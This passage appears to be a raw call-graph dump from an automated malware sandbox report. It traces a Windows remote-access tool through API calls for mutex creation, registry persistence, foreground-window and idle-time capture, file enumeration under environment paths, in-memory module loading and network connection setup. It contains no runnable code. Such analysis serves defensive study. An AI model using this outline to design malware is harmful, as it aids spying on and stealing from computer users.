52996->52997 52998 40219f 52997->52998 53249 402730 11 API calls 52997->53249 52998->52792 53000 402184 53250 402712 11 API calls std::_Deallocate 53000->53250 53003 404243 53002->53003 53004 4023ce 11 API calls 53003->53004 53005 40424e 53004->53005 53006 402569 28 API calls 53005->53006 53007 4041b5 53006->53007 53007->52780 53009 41ce41 53008->53009 53010 41cea0 53009->53010 53014 41ce51 53009->53014 53011 41ceba 53010->53011 53012 41cfe0 28 API calls 53010->53012 53028 41d146 28 API calls 53011->53028 53012->53011 53015 41ce89 53014->53015 53019 41cfe0 53014->53019 53027 41d146 28 API calls 53015->53027 53016 41ce9c 53016->52829 53021 41cfe8 53019->53021 53020 41d01a 53020->53015 53021->53020 53022 41d002 53021->53022 53023 41d01e 53021->53023 53029 41d051 53022->53029 53039 402725 22 API calls 53023->53039 53027->53016 53028->53016 53030 41d05b __EH_prolog 53029->53030 53040 402717 22 API calls 53030->53040 53032 41d06e 53041 41d15d 11 API calls 53032->53041 53034 41d094 53035 41d0cc 53034->53035 53042 402730 11 API calls 53034->53042 53035->53020 53037 41d0b3 53043 402712 11 API calls std::_Deallocate 53037->53043 53040->53032 53041->53034 53042->53037 53043->53035 53045 40b90c 53044->53045 53083 402252 53045->53083 53047 40b917 53087 40b92c 53047->53087 53049 40b926 53049->52883 53052 41326b 53050->53052 53053 41323c 53050->53053 53051 41327a 53117 40417e 53051->53117 53052->53051 53109 10001c5b 53052->53109 53113 411cf2 53053->53113 53057 401fd8 11 API calls 53059 412f28 53057->53059 53059->52891 53063 402252 11 API calls 53062->53063 53064 401f12 53063->53064 53064->52887 53066 41bd2b 53065->53066 53067 4020b7 28 API calls 53066->53067 53068 412f60 53067->53068 53069 41bb8e 53068->53069 53239 441e81 53069->53239 53072 402093 28 API calls 53073 412f7a 53072->53073 53073->52904 53079 402eb0 53074->53079 53075 402ef2 53076 401fb0 28 API calls 53075->53076 53077 402ef0 53076->53077 53078 402055 11 API calls 53077->53078 53080 402f09 53078->53080 53079->53075 53081 402ee7 53079->53081 53080->52936 53248 403365 28 API calls 53081->53248 53084 4022ac 53083->53084 53085 40225c 53083->53085 53084->53047 53085->53084 53094 402779 11 API calls std::_Deallocate 53085->53094 53088 40b966 53087->53088 53089 40b938 53087->53089 53106 4028a4 22 API calls 53088->53106 53095 4027e6 53089->53095 53093 40b942 53093->53049 53094->53084 53096 4027ef 53095->53096 53097 402851 53096->53097 53098 4027f9 53096->53098 53108 4028a4 22 API calls 53097->53108 53101 402802 53098->53101 53103 402815 53098->53103 53107 402aea 28 API calls __EH_prolog 53101->53107 53104 402813 53103->53104 53105 402252 11 API calls 53103->53105 53104->53093 53105->53104 53107->53104 53110 10001c6b ___scrt_fastfail 53109->53110 53123 100012ee 53110->53123 53112 10001c87 53112->53051 53165 411cfe 53113->53165 53116 411f67 22 API calls ___std_exception_copy 53116->53052 53118 404186 53117->53118 53119 402252 11 API calls 53118->53119 53120 404191 53119->53120 53218 4041bc 53120->53218 53124 10001324 ___scrt_fastfail 53123->53124 53125 100013b7 GetEnvironmentVariableW 53124->53125 53149 100010f1 53125->53149 53128 100010f1 57 API calls 53129 10001465 53128->53129 53130 100010f1 57 API calls 53129->53130 53131 10001479 53130->53131 53132 100010f1 57 API calls 53131->53132 53133 1000148d 53132->53133 53134 100010f1 57 API calls 53133->53134 53135 100014a1 53134->53135 53136 100010f1 57 API calls 53135->53136 53137 100014b5 lstrlenW 53136->53137 53138 100014d2 53137->53138 53139 100014d9 lstrlenW 53137->53139 53138->53112 53140 100010f1 57 API calls 53139->53140 53141 10001501 lstrlenW lstrcatW 53140->53141 53142 100010f1 57 API calls 53141->53142 53143 10001539 lstrlenW lstrcatW 53142->53143 53144 100010f1 57 API calls 53143->53144 53145 1000156b lstrlenW lstrcatW 53144->53145 53146 100010f1 57 API calls 53145->53146 53147 1000159d lstrlenW lstrcatW 53146->53147 53148 100010f1 57 API calls 53147->53148 53148->53138 53150 10001118 ___scrt_fastfail 53149->53150 53151 10001129 lstrlenW 53150->53151 53162 10002c40 53151->53162 53153 10001148 lstrcatW lstrlenW 53154 10001177 lstrlenW FindFirstFileW 53153->53154 53155 10001168 lstrlenW 53153->53155 53156 100011a0 53154->53156 53157 100011e1 53154->53157 53155->53154 53158 100011c7 FindNextFileW 53156->53158 53161 100011aa 53156->53161 53157->53128 53158->53156 53159 100011da FindClose 53158->53159 53159->53157 53161->53158 53164 10001000 57 API calls ___scrt_fastfail 53161->53164 53163 10002c57 53162->53163 53163->53153 53163->53163 53164->53161 53198 41179c 53165->53198 53167 411d1c 53168 411d32 SetLastError 53167->53168 53169 41179c SetLastError 53167->53169 53195 411cfa 53167->53195 53168->53195 53170 411d4f 53169->53170 53170->53168 53172 411d71 GetNativeSystemInfo 53170->53172 53170->53195 53173 411db7 53172->53173 53184 411dc4 SetLastError 53173->53184 53201 411ca3 VirtualAlloc 53173->53201 53176 411de7 53177 411e0c GetProcessHeap HeapAlloc 53176->53177 53211 411ca3 VirtualAlloc 53176->53211 53179 411e23 53177->53179 53180 411e35 53177->53180 53212 411cba VirtualFree 53179->53212 53183 41179c SetLastError 53180->53183 53181 411dff 53181->53177 53181->53184 53185 411e7e 53183->53185 53184->53195 53186 411f30 53185->53186 53202 411ca3 VirtualAlloc 53185->53202 53213 412077 GetProcessHeap HeapFree 53186->53213 53189 411e97 ctype 53203 4117af SetLastError ctype ___scrt_fastfail 53189->53203 53191 411ec3 53191->53186 53204 411b5f 26 API calls 53191->53204 53193 411ef0 53193->53186 53205 41194f 53193->53205 53195->53116 53196 411efb 53196->53186 53196->53195 53197 411f25 SetLastError 53196->53197 53197->53186 53199 4117a0 SetLastError 53198->53199 53200 4117ab 53198->53200 53199->53167 53200->53167 53201->53176 53202->53189 53203->53191 53204->53193 53209 411975 53205->53209 53206 411a5e 53207 4118b2 VirtualProtect 53206->53207 53208 411a70 53207->53208 53208->53196 53209->53206 53209->53208 53214 4118b2 53209->53214 53211->53181 53212->53184 53213->53195 53215 4118c3 53214->53215 53217 4118bb 53214->53217 53216 411936 VirtualProtect 53215->53216 53215->53217 53216->53217 53217->53209 53219 4041c8 53218->53219 53222 4041d9 53219->53222 53221 40419c 53221->53057 53223 4041e9 53222->53223 53224 404206 53223->53224 53225 4041ef 53223->53225 53226 4027e6 28 API calls 53224->53226 53229 404267 53225->53229 53228 404204 53226->53228 53228->53221 53230 402888 22 API calls 53229->53230 53231 40427b 53230->53231 53232 404290 53231->53232 53233 4042a5 53231->53233 53235 4042df 22 API calls 53232->53235 53234 4027e6 28 API calls 53233->53234 53238 4042a3 53234->53238 53236 404299 53235->53236 53237 402c48 22 API calls 53236->53237 53237->53238 53238->53228 53240 441e8d 53239->53240 53243 441c7d 53240->53243 53242 41bbb2 53242->53072 53244 441c94 53243->53244 53246 441ccb pre_c_initialization 53244->53246 53247 4405dd 20 API calls _Atexit 53244->53247 53246->53242 53247->53246 53248->53077 53249->53000 53250->52998 53251->52821 53253 4020f6 28 API calls 53252->53253 53254 415b0c SetEvent 53253->53254 53255 415b21 53254->53255 53256 4041a2 28 API calls 53255->53256 53257 415b3b 53256->53257 53258 4020f6 28 API calls 53257->53258 53259 415b4b 53258->53259 53260 4020f6 28 API calls 53259->53260 53261 415b5d 53260->53261 53262 41be1b 28 API calls 53261->53262 53263 415b66 53262->53263 53265 415b86 GetTickCount 53263->53265 53266 415ce5 53263->53266 53329 415cd6 53263->53329 53264 401e8d 11 API calls 53267 417092 53264->53267 53268 41bb8e 28 API calls 53265->53268 53266->53329 53330 415cf9 53266->53330 53269 401fd8 11 API calls 53267->53269 53270 415b97 53268->53270 53272 41709e 53269->53272 53331 41bae6 GetLastInputInfo GetTickCount 53270->53331 53274 401fd8 11 API calls 53272->53274 53276 4170aa 53274->53276 53275 415ba3 53277 41bb8e 28 API calls 53275->53277 53278 415bae 53277->53278 53332 41ba96 53278->53332 53281 41bd1e 28 API calls 53282 415bca 53281->53282 53283 401e65 22 API calls 53282->53283 53284 415bd8 53283->53284 53285 402f31 28 API calls 53284->53285 53286 415be6 53285->53286 53287 402ea1 28 API calls 53286->53287 53288 415bf5 53287->53288 53289 402f10 28 API calls 53288->53289 53290 415c04 53289->53290 53291 402ea1 28 API calls 53290->53291 53292 415c13 53291->53292 53293 402f10 28 API calls 53292->53293 53294 415c1f 53293->53294 53295 402ea1 28 API calls 53294->53295 53296 415c29 53295->53296 53297 404aa1 61 API calls 53296->53297 53298 415c38 53297->53298 53299 401fd8 11 API calls 53298->53299 53300 415c41 53299->53300 53301 401fd8 11 API calls 53300->53301 53302 415c4d 53301->53302 53303 401fd8 11 API calls 53302->53303 53304 415c59 53303->53304 53305 401fd8 11 API calls 53304->53305 53306 415c65 53305->53306 53307 401fd8 11 API calls 53306->53307 53308 415c71 53307->53308 53309 401fd8 11 API calls 53308->53309 53310 415c7d 53309->53310 53311 401f09 11 API calls 53310->53311 53312 415c86 53311->53312 53313 401fd8 11 API calls 53312->53313 53314 415c8f 53313->53314 53315 401fd8 11 API calls 53314->53315 53316 415c98 53315->53316 53317 401e65 22 API calls 53316->53317 53318 415ca3 53317->53318 53337 43baac 53318->53337 53321 415cb5 53324 415cc3 53321->53324 53325 415cce 53321->53325 53322 415cdb 53323 401e65 22 API calls 53322->53323 53323->53266 53341 404ff4 82 API calls 53324->53341 53342 404f51 53325->53342 53328 415cc9 53328->53329 53329->53264 53357 4050e4 84 API calls 53330->53357 53331->53275 53358 436e90 53332->53358 53335 40417e 28 API calls 53336 415bbc 53335->53336 53336->53281 53338 43bac5 _swprintf 53337->53338 53360 43ae03 53338->53360 53340 415cb0 53340->53321 53340->53322 53341->53328 53343 404f65 53342->53343 53344 404fea 53342->53344 53345 404f6e 53343->53345 53346 404fc0 CreateEventA CreateThread 53343->53346 53347 404f7d GetLocalTime 53343->53347 53344->53329 53345->53346 53346->53344 53389 405150 53346->53389 53348 41bb8e 28 API calls 53347->53348 53349 404f91 53348->53349 53388 4052fd 28 API calls 53349->53388 53357->53328 53359 41bab5 GetForegroundWindow GetWindowTextW 53358->53359 53359->53335 53376 43ba0a 53360->53376 53362 43ae50 53382 43a7b7 36 API calls 3 library calls 53362->53382 53363 43ae15 53363->53362 53364 43ae2a 53363->53364 53367 43ae2f pre_c_initialization 53363->53367 53381 4405dd 20 API calls _Atexit 53364->53381 53367->53340 53369 43ae5c 53371 43ae8b 53369->53371 53383 43ba4f 40 API calls __Toupper 53369->53383 53370 43aef7 53385 43b9b6 20 API calls 2 library calls 53370->53385 53371->53370 53384 43b9b6 20 API calls 2 library calls 53371->53384 53374 43afbe _swprintf 53374->53367 53386 4405dd 20 API calls _Atexit 53374->53386 53377 43ba22 53376->53377 53378 43ba0f 53376->53378 53377->53363 53387 4405dd 20 API calls _Atexit 53378->53387 53380 43ba14 pre_c_initialization 53380->53363 53381->53367 53382->53369 53383->53369 53384->53370 53385->53374 53386->53367 53387->53380 53392 40515c 102 API calls 53389->53392 53391 405159 53392->53391 53393->52764 53394->52769 53395->52771 53396 434887 53397 434893 ___DestructExceptionObject 53396->53397 53423 434596 53397->53423 53399 43489a 53401 4348c3 53399->53401 53721 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 53399->53721 53409 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53401->53409 53722 444251 5 API calls CatchGuardHandler 53401->53722 53403 4348dc 53405 4348e2 ___DestructExceptionObject 53403->53405 53723 4441f5 5 API calls CatchGuardHandler 53403->53723 53406 434962 53434 434b14 53406->53434 53409->53406 53724 4433e7 36 API calls 4 library calls 53409->53724 53416 434984 53417 43498e 53416->53417 53726 44341f 28 API calls _Atexit 53416->53726 53419 434997 53417->53419 53727 4433c2 28 API calls _Atexit 53417->53727 53728 43470d 13 API calls 2 library calls 53419->53728 53422 43499f 53422->53405 53424 43459f 53423->53424 53729 434c52 IsProcessorFeaturePresent 53424->53729 53426 4345ab 53730 438f31 10 API calls 4 library calls 53426->53730 53428 4345b0 53429 4345b4 53428->53429 53731 4440bf 53428->53731 53429->53399 53432 4345cb 53432->53399 53435 436e90 ___scrt_fastfail 53434->53435 53436 434b27 GetStartupInfoW 53435->53436 53437 434968 53436->53437 53438 4441a2 53437->53438 53803 44f059 53438->53803 53440 434971 53443 40e9c5 53440->53443 53441 4441ab 53441->53440 53807 446815 36 API calls 53441->53807 53809 41cb50 LoadLibraryA GetProcAddress 53443->53809 53445 40e9e1 GetModuleFileNameW 53814 40f3c3 53445->53814 53447 40e9fd 53448 4020f6 28 API calls 53447->53448 53449 40ea0c 53448->53449 53450 4020f6 28 API calls 53449->53450 53451 40ea1b 53450->53451 53452 41be1b 28 API calls 53451->53452 53453 40ea24 53452->53453 53829 40fb17 53453->53829 53455 40ea2d 53456 401e8d 11 API calls 53455->53456 53457 40ea36 53456->53457 53458 40ea93 53457->53458 53459 40ea49 53457->53459 53460 401e65 22 API calls 53458->53460 54023 40fbb3 97 API calls 53459->54023 53462 40eaa3 53460->53462 53466 401e65 22 API calls 53462->53466 53463 40ea5b 53464 401e65 22 API calls 53463->53464 53465 40ea67 53464->53465 54024 410f37 36 API calls __EH_prolog 53465->54024 53467 40eac2 53466->53467 53469 40531e 28 API calls 53467->53469 53470 40ead1 53469->53470 53472 406383 28 API calls 53470->53472 53471 40ea79 54025 40fb64 78 API calls 53471->54025 53474 40eadd 53472->53474 53476 401fe2 28 API calls 53474->53476 53475 40ea82 54026 40f3b0 71 API calls 53475->54026 53478 40eae9 53476->53478 53479 401fd8 11 API calls 53478->53479 53480 40eaf2 53479->53480 53482 401fd8 11 API calls 53480->53482 53481 401fd8 11 API calls 53483 40eefb 53481->53483 53484 40eafb 53482->53484 53725 4432f6 GetModuleHandleW 53483->53725 53485 401e65 22 API calls 53484->53485 53486 40eb04 53485->53486 53487 401fc0 28 API calls 53486->53487 53488 40eb0f 53487->53488 53489 401e65 22 API calls 53488->53489 53490 40eb28 53489->53490 53491 401e65 22 API calls 53490->53491 53492 40eb43 53491->53492 53493 40ebae 53492->53493 54027 406c1e 53492->54027 53494 401e65 22 API calls 53493->53494 53500 40ebbb 53494->53500 53496 40eb70 53497 401fe2 28 API calls 53496->53497 53498 40eb7c 53497->53498 53501 401fd8 11 API calls 53498->53501 53499 40ec02 53833 40d069 53499->53833 53500->53499 53506 413549 3 API calls 53500->53506 53503 40eb85 53501->53503 54032 413549 RegOpenKeyExA 53503->54032 53504 40ec08 53505 40ea8b 53504->53505 53836 41b2c3 53504->53836 53505->53481 53512 40ebe6 53506->53512 53510 40f34f 54125 4139a9 30 API calls 53510->54125 53511 40ec23 53513 40ec76 53511->53513 53853 407716 53511->53853 53512->53499 54035 4139a9 30 API calls 53512->54035 53515 401e65 22 API calls 53513->53515 53518 40ec7f 53515->53518 53527 40ec90 53518->53527 53528 40ec8b 53518->53528 53520 40f365 54126 412475 65 API calls ___scrt_fastfail 53520->54126 53521 40ec42 54036 407738 30 API calls 53521->54036 53522 40ec4c 53525 401e65 22 API calls 53522->53525 53537 40ec55 53525->53537 53526 40f36f 53530 41bc5e 28 API calls 53526->53530 53533 401e65 22 API calls 53527->53533 54039 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 53528->54039 53529 40ec47 54037 407260 98 API calls 53529->54037 53534 40f37f 53530->53534 53535 40ec99 53533->53535 53925 413a23 RegOpenKeyExW 53534->53925 53857 41bc5e 53535->53857 53537->53513 53541 40ec71 53537->53541 53538 40eca4 53861 401f13 53538->53861 54038 407260 98 API calls 53541->54038 53545 401f09 11 API calls 53546 40f39c 53545->53546 53548 401f09 11 API calls 53546->53548 53547 401f09 11 API calls 53549 40ecb8 53547->53549 53550 40f3a5 53548->53550 53551 401e65 22 API calls 53549->53551 53928 40dd42 53550->53928 53552 40ecc1 53551->53552 53556 401e65 22 API calls 53552->53556 53558 40ecdb 53556->53558 53557 40f3af 53559 401e65 22 API calls 53558->53559 53560 40ecf5 53559->53560 53561 401e65 22 API calls 53560->53561 53563 40ed0e 53561->53563 53562 40ed7b 53565 40ed8a 53562->53565 53570 40ef06 ___scrt_fastfail 53562->53570 53563->53562 53564 401e65 22 API calls 53563->53564 53569 40ed23 _wcslen 53564->53569 53566 40ed93 53565->53566 53592 40ee0f ___scrt_fastfail 53565->53592 53567 401e65 22 API calls 53566->53567 53568 40ed9c 53567->53568 53571 401e65 22 API calls 53568->53571 53569->53562 53572 401e65 22 API calls 53569->53572 54100 4136f8 RegOpenKeyExA 53570->54100 53573 40edae 53571->53573 53574 40ed3e 53572->53574 53576 401e65 22 API calls 53573->53576 53578 401e65 22 API calls 53574->53578 53577 40edc0 53576->53577 53581 401e65 22 API calls 53577->53581 53579 40ed53 53578->53579 54040 40da34 53579->54040 53580 40ef51 53582 401e65 22 API calls 53580->53582 53583 40ede9 53581->53583 53584 40ef76 53582->53584 53589 401e65 22 API calls 53583->53589 53590 402093 28 API calls 53584->53590 53587 401f13 28 API calls 53588 40ed72 53587->53588 53591 401f09 11 API calls 53588->53591 53593 40edfa 53589->53593 53594 40ef88 53590->53594 53591->53562 53870 413947 53592->53870 54098 40cdf9 46 API calls _wcslen 53593->54098 53880 41376f RegCreateKeyA 53594->53880 53599 40eea3 ctype 53603 401e65 22 API calls 53599->53603 53600 40ee0a 53600->53592 53601 401e65 22 API calls 53602 40efaa 53601->53602 53605 43baac 40 API calls 53602->53605 53604 40eeba 53603->53604 53604->53580 53608 40eece 53604->53608 53606 40efb7 53605->53606 53607 40efc1 53606->53607 53609 40efe4 53606->53609 54103 41cd9b 88 API calls ___scrt_fastfail 53607->54103 53610 401e65 22 API calls 53608->53610 53613 402093 28 API calls 53609->53613 53611 40eed7 53610->53611 53614 41bc5e 28 API calls 53611->53614 53616 40eff9 53613->53616 53617 40eee3 53614->53617 53615 40efc8 CreateThread 53615->53609 54577 41d45d 10 API calls 53615->54577 53618 402093 28 API calls 53616->53618 54099 40f474 114 API calls 53617->54099 53620 40f008 53618->53620 53622 41b4ef 80 API calls 53620->53622 53621 40eee8 53621->53580 53623 40eeef 53621->53623 53624 40f00d 53622->53624 53623->53505 53625 401e65 22 API calls 53624->53625 53626 40f019 53625->53626 53627 401e65 22 API calls 53626->53627 53628 40f02b 53627->53628 53629 401e65 22 API calls 53628->53629 53630 40f04b 53629->53630 53631 43baac 40 API calls 53630->53631 53632 40f058 53631->53632 53633 401e65 22 API calls 53632->53633 53634 40f063 53633->53634 53635 401e65 22 API calls 53634->53635 53636 40f074 53635->53636 53637 401e65 22 API calls 53636->53637 53638 40f089 53637->53638 53639 401e65 22 API calls 53638->53639 53640 40f09a 53639->53640 53641 40f0a1 StrToIntA 53640->53641 53886 409de4 53641->53886 53644 401e65 22 API calls 53645 40f0bc 53644->53645 53646 40f101 53645->53646 53647 40f0c8 53645->53647 53649 401e65 22 API calls 53646->53649 54104 4344ea 53647->54104 53651 40f111 53649->53651 53655 40f159 53651->53655 53656 40f11d 53651->53656 53652 401e65 22 API calls 53653 40f0e4 53652->53653 53654 40f0eb CreateThread 53653->53654 53654->53646 54575 419fb4 113 API calls __EH_prolog 53654->54575 53658 401e65 22 API calls 53655->53658 53657 4344ea new 22 API calls 53656->53657 53660 40f126 53657->53660 53659 40f162 53658->53659 53663 40f1cc 53659->53663 53664 40f16e 53659->53664 53661 401e65 22 API calls 53660->53661 53662 40f138 53661->53662 53667 40f13f CreateThread 53662->53667 53665 401e65 22 API calls 53663->53665 53666 401e65 22 API calls 53664->53666 53668 40f1d5 53665->53668 53669 40f17e 53666->53669 53667->53655 54574 419fb4 113 API calls __EH_prolog 53667->54574 53670 40f1e1 53668->53670 53671 40f21a 53668->53671 53672 401e65 22 API calls 53669->53672 53674 401e65 22 API calls 53670->53674 53911 41b60d GetComputerNameExW GetUserNameW 53671->53911 53675 40f193 53672->53675 53677 40f1ea 53674->53677 54111 40d9e8 53675->54111 53682 401e65 22 API calls 53677->53682 53678 401f13 28 API calls 53679 40f22e 53678->53679 53681 401f09 11 API calls 53679->53681 53684 40f237 53681->53684 53685 40f1ff 53682->53685 53687 40f240 SetProcessDEPPolicy 53684->53687 53688 40f243 CreateThread 53684->53688 53693 43baac 40 API calls 53685->53693 53686 401f13 28 API calls 53689 40f1b2 53686->53689 53687->53688 53691 40f264 53688->53691 53692 40f258 CreateThread 53688->53692 54546 40f7a7 53688->54546 53690 401f09 11 API calls 53689->53690 53694 40f1bb CreateThread 53690->53694 53695 40f279 53691->53695 53696 40f26d CreateThread 53691->53696 53692->53691 53697 40f20c 53693->53697 53694->53663 54576 401be9 50 API calls 53694->54576 53698 40f2cc 53695->53698 53700 402093 28 API calls 53695->53700 53696->53695 54573 4126db 38 API calls ___scrt_fastfail 53696->54573 54122 40c162 7 API calls 53697->54122 53922 4134ff RegOpenKeyExA 53698->53922 53701 40f29c 53700->53701 54123 4052fd 28 API calls 53701->54123 53706 40f2ed 53708 41bc5e 28 API calls 53706->53708 53710 40f2fd 53708->53710 54124 41361b 31 API calls 53710->54124 53715 40f313 53716 401f09 11 API calls 53715->53716 53719 40f31e 53716->53719 53717 40f346 DeleteFileW 53718 40f34d 53717->53718 53717->53719 53718->53526 53719->53526 53719->53717 53720 40f334 Sleep 53719->53720 53720->53719 53721->53399 53722->53403 53723->53409 53724->53406 53725->53416 53726->53417 53727->53419 53728->53422 53729->53426 53730->53428 53735 44fb68 53731->53735 53734 438f5a 8 API calls 3 library calls 53734->53429 53736 44fb85 53735->53736 53737 44fb81 53735->53737 53736->53737 53741 449ca6 53736->53741 53753 434fcb 53737->53753 53739 4345bd 53739->53432 53739->53734 53742 449cb2 ___DestructExceptionObject 53741->53742 53760 445888 EnterCriticalSection 53742->53760 53744 449cb9 53761 450183 53744->53761 53746 449cc8 53747 449cd7 53746->53747 53772 449b3a 23 API calls 53746->53772 53774 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 53747->53774 53750 449cd2 53773 449bf0 GetStdHandle GetFileType 53750->53773 53751 449ce8 ___DestructExceptionObject 53751->53736 53754 434fd6 IsProcessorFeaturePresent 53753->53754 53755 434fd4 53753->53755 53757 435018 53754->53757 53755->53739 53802 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53757->53802 53759 4350fb 53759->53739 53760->53744 53762 45018f ___DestructExceptionObject 53761->53762 53763 4501b3 53762->53763 53764 45019c 53762->53764 53775 445888 EnterCriticalSection 53763->53775 53783 4405dd 20 API calls _Atexit 53764->53783 53767 4501bf 53771 4501eb 53767->53771 53776 4500d4 53767->53776 53769 4501a1 pre_c_initialization ___DestructExceptionObject 53769->53746 53784 450212 LeaveCriticalSection std::_Lockit::~_Lockit 53771->53784 53772->53750 53773->53747 53774->53751 53775->53767 53785 445af3 53776->53785 53778 4500f3 53793 446782 53778->53793 53779 4500e6 53779->53778 53792 448a84 11 API calls 2 library calls 53779->53792 53781 450145 53781->53767 53783->53769 53784->53769 53791 445b00 ___crtLCMapStringA 53785->53791 53786 445b40 53800 4405dd 20 API calls _Atexit 53786->53800 53787 445b2b RtlAllocateHeap 53788 445b3e 53787->53788 53787->53791 53788->53779 53791->53786 53791->53787 53799 442f80 7 API calls 2 library calls 53791->53799 53792->53779 53794 44678d RtlFreeHeap 53793->53794 53795 4467b6 __dosmaperr 53793->53795 53794->53795 53796 4467a2 53794->53796 53795->53781 53801 4405dd 20 API calls _Atexit 53796->53801 53798 4467a8 GetLastError 53798->53795 53799->53791 53800->53788 53801->53798 53802->53759 53804 44f06b 53803->53804 53805 44f062 53803->53805 53804->53441 53808 44ef58 49 API calls 5 library calls 53805->53808 53807->53441 53808->53804 53810 41cb8f LoadLibraryA GetProcAddress 53809->53810 53811 41cb7f GetModuleHandleA GetProcAddress 53809->53811 53812 41cbb8 44 API calls 53810->53812 53813 41cba8 LoadLibraryA GetProcAddress 53810->53813 53811->53810 53812->53445 53813->53812 54127 41b4a8 FindResourceA 53814->54127 53817 43bd51 ___std_exception_copy 21 API calls 53818 40f3ed ctype 53817->53818 53819 4020b7 28 API calls 53818->53819 53820 40f408 53819->53820 53821 401fe2 28 API calls 53820->53821 53822 40f413 53821->53822 53823 401fd8 11 API calls 53822->53823 53824 40f41c 53823->53824 53825 43bd51 ___std_exception_copy 21 API calls 53824->53825 53826 40f42d ctype 53825->53826 54130 406dd8 53826->54130 53828 40f460 53828->53447 53830 40fb23 53829->53830 53831 40fb2a 53829->53831 54133 402163 11 API calls 53830->54133 53831->53455 54134 401fab 53833->54134 53835 40d073 CreateMutexA GetLastError 53835->53504 54135 41bfb7 53836->54135 53841 401fe2 28 API calls 53842 41b2ff 53841->53842 53843 401fd8 11 API calls 53842->53843 53844 41b307 53843->53844 53845 4135a6 31 API calls 53844->53845 53846 41b35d 53844->53846 53847 41b330 53845->53847 53846->53511 53848 41b33b StrToIntA 53847->53848 53849 41b352 53848->53849 53850 41b349 53848->53850 53851 401fd8 11 API calls 53849->53851 54144 41cf69 22 API calls 53850->54144 53851->53846 53854 40772a 53853->53854 53855 413549 3 API calls 53854->53855 53856 407731 53855->53856 53856->53521 53856->53522 53858 41bc72 53857->53858 53859 40b904 28 API calls 53858->53859 53860 41bc7a 53859->53860 53860->53538 53862 401f22 53861->53862 53863 401f6a 53861->53863 53864 402252 11 API calls 53862->53864 53863->53547 53865 401f2b 53864->53865 53866 401f6d 53865->53866 53867 401f46 53865->53867 54146 402336 53866->54146 54145 40305c 28 API calls 53867->54145 53871 413965 53870->53871 53872 406dd8 28 API calls 53871->53872 53873 41397a 53872->53873 53874 4020f6 28 API calls 53873->53874 53875 41398a 53874->53875 53876 41376f 14 API calls 53875->53876 53877 413994 53876->53877 53878 401fd8 11 API calls 53877->53878 53879 4139a1 53878->53879 53879->53599 53881 4137bf 53880->53881 53882 413788 53880->53882 53883 401fd8 11 API calls 53881->53883 53885 41379a RegSetValueExA RegCloseKey 53882->53885 53884 40ef9e 53883->53884 53884->53601 53885->53881 53887 409e02 _wcslen 53886->53887 53888 409e24 53887->53888 53889 409e0d 53887->53889 53891 40da34 32 API calls 53888->53891 53890 40da34 32 API calls 53889->53890 53892 409e15 53890->53892 53893 409e2c 53891->53893 53894 401f13 28 API calls 53892->53894 53895 401f13 28 API calls 53893->53895 53896 409e1f 53894->53896 53897 409e3a 53895->53897 53899 401f09 11 API calls 53896->53899 53898 401f09 11 API calls 53897->53898 53900 409e42 53898->53900 53901 409e79 53899->53901 54165 40915b 28 API calls 53900->54165 54150 40a109 53901->54150 53904 409e54 54166 403014 53904->54166 53908 401f13 28 API calls 53909 409e69 53908->53909 53910 401f09 11 API calls 53909->53910 53910->53896 53912 40417e 28 API calls 53911->53912 53913 41b65c 53912->53913 54365 4042fc 53913->54365 53916 403014 28 API calls 53917 41b672 53916->53917 53918 401f09 11 API calls 53917->53918 53919 41b67b 53918->53919 53920 401f09 11 API calls 53919->53920 53921 40f223 53920->53921 53921->53678 53923 413520 RegQueryValueExA RegCloseKey 53922->53923 53924 40f2e4 53922->53924 53923->53924 53924->53550 53924->53706 53926 40f392 53925->53926 53927 413a3f RegDeleteValueW 53925->53927 53926->53545 53927->53926 53929 40dd5b 53928->53929 53930 4134ff 3 API calls 53929->53930 53931 40dd62 53930->53931 53935 40dd81 53931->53935 54440 401707 53931->54440 53933 40dd6f 54443 413877 RegCreateKeyA 53933->54443 53936 414f2a 53935->53936 53937 4020df 11 API calls 53936->53937 53938 414f3e 53937->53938 54457 41b8b3 53938->54457 53941 4020df 11 API calls 53942 414f54 53941->53942 53943 401e65 22 API calls 53942->53943 53944 414f62 53943->53944 53945 43baac 40 API calls 53944->53945 53946 414f6f 53945->53946 53947 414f81 53946->53947 53948 414f74 Sleep 53946->53948 53949 402093 28 API calls 53947->53949 53948->53947 53950 414f90 53949->53950 53951 401e65 22 API calls 53950->53951 53952 414f99 53951->53952 53953 4020f6 28 API calls 53952->53953 53954 414fa4 53953->53954 53955 41be1b 28 API calls 53954->53955 53956 414fac 53955->53956 54461 40489e WSAStartup 53956->54461 53958 414fb6 53959 401e65 22 API calls 53958->53959 53960 414fbf 53959->53960 53961 401e65 22 API calls 53960->53961 53987 41503e 53960->53987 53962 414fd8 53961->53962 53963 401e65 22 API calls 53962->53963 53964 414fe9 53963->53964 53966 401e65 22 API calls 53964->53966 53965 41be1b 28 API calls 53965->53987 53967 414ffa 53966->53967 53969 401e65 22 API calls 53967->53969 53968 406c1e 28 API calls 53968->53987 53970 41500b 53969->53970 53971 401e65 22 API calls 53970->53971 53973 41501c 53971->53973 53972 401fe2 28 API calls 53972->53987 53974 401e65 22 API calls 53973->53974 53975 41502e 53974->53975 54486 40473d 89 API calls 53975->54486 53976 401e65 22 API calls 53976->53987 53978 402f10 28 API calls 53978->53987 53979 41b4ef 80 API calls 53979->53987 53981 41518c WSAGetLastError 54487 41cae1 30 API calls 53981->54487 53983 40482d 3 API calls 53983->53987 53985 404f51 105 API calls 53985->53987 53986 402093 28 API calls 53986->53987 53987->53965 53987->53968 53987->53972 53987->53976 53987->53978 53987->53979 53987->53981 53987->53983 53987->53985 53987->53986 53988 4048c8 97 API calls 53987->53988 53989 404e26 99 API calls 53987->53989 53990 40531e 28 API calls 53987->53990 53992 401e8d 11 API calls 53987->53992 53993 406383 28 API calls 53987->53993 53994 415a33 53987->53994 53999 40905c 28 API calls 53987->53999 54000 441e81 20 API calls 53987->54000 54001 4020f6 28 API calls 53987->54001 54002 4136f8 3 API calls 53987->54002 54003 4135a6 31 API calls 53987->54003 54004 40417e 28 API calls 53987->54004 54007 401e65 22 API calls 53987->54007 54011 41bb8e 28 API calls 53987->54011 54012 41ba96 30 API calls 53987->54012 54013 41bd1e 28 API calls 53987->54013 54015 402f31 28 API calls 53987->54015 54016 